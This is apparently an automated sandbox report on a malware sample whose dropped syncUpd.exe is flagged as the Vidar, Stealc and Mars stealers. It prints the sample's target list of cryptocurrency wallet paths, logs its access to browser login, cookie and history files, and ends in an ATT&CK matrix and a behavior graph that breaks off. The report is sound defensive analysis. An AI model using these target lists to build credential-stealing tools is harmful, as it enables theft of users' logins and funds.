Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet*Xq
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3283292607.0000000026EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Yara detected Socks5Systemz
                        Source: Yara matchFile source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: weblinkanalyzer.exe PID: 7312, type: MEMORYSTR
                        Yara detected Stealc
                        Source: Yara matchFile source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A590B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,17_2_6A590B40
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4B8EA0 sqlite3_clear_bindings,17_2_6A4B8EA0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A590C40 sqlite3_bind_zeroblob,17_2_6A590C40
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A590D60 sqlite3_bind_parameter_name,17_2_6A590D60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4422D0 sqlite3_bind_blob,17_2_6A4422D0

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts13
                        Native API                        		11
                        Scripting                        		1
                        Exploitation for Privilege Escalation                        		211
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Shared Modules                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		2
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts12
                        Command and Scripting Interpreter                        		4
                        Windows Service                        		1
                        Access Token Manipulation                        		21
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Clipboard Data                        		1
                        Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution                        		2
                        Registry Run Keys / Startup Folder                        		4
                        Windows Service                        		21
                        Software Packing                        		NTDS157
                        System Information Discovery                        		Distributed Component Object ModelInput Capture1
                        Proxy                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        Bootkit                        		413
                        Process Injection                        		1
                        Timestomp                        		LSA Secrets1
                        Query Registry                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		Cached Domain Credentials131
                        Security Software Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                        Masquerading                        		DCSync141
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry                        		Proc Filesystem13
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadow11
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation                        		Network Sniffing3
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd413
                        Process Injection                        		Input Capture1
                        Remote System Discovery                        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Bootkit                        		Keylogging1
                        System Network Configuration Discovery                        		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1407460 Sample: file.exe Startdate: 12/03/2024 Architecture: WINDOWS Score: 100 126 Found malware configuration 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 Antivirus detection for dropped file 2->130 132 15 other signatures 2->132 10 file.exe 15 3 2->10         started        15 svchost.exe 2->15         started        17 svchost.exe 1 1 2->17         started        process3 dnsIp4 120 14.232.235.13 VNPT-AS-VNVNPTCorpVN Viet Nam 10->120 122 74.103.66.15 UUNETUS United States 10->122 124 98 other IPs or domains 10->124 82 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 10->82 dropped 150 Writes to foreign memory regions 10->150 152 Adds a directory exclusion to Windows Defender 10->152 154 Disables UAC (registry) 10->154 156 3 other signatures 10->156 19 InstallUtil.exe 10->19         started        23 powershell.exe 21 10->23         started        25 WerFault.exe 10->25         started        27 WerFault.exe 15->27         started        file5 signatures6 process7 file8 74 C:\Users\...\zrNC9V37VM40VjYOUVLhb0U4.exe, PE32 19->74 dropped 76 C:\Users\...\xYgVykjMJXKeoDKuEBWTMXD2.exe, PE32 19->76 dropped 78 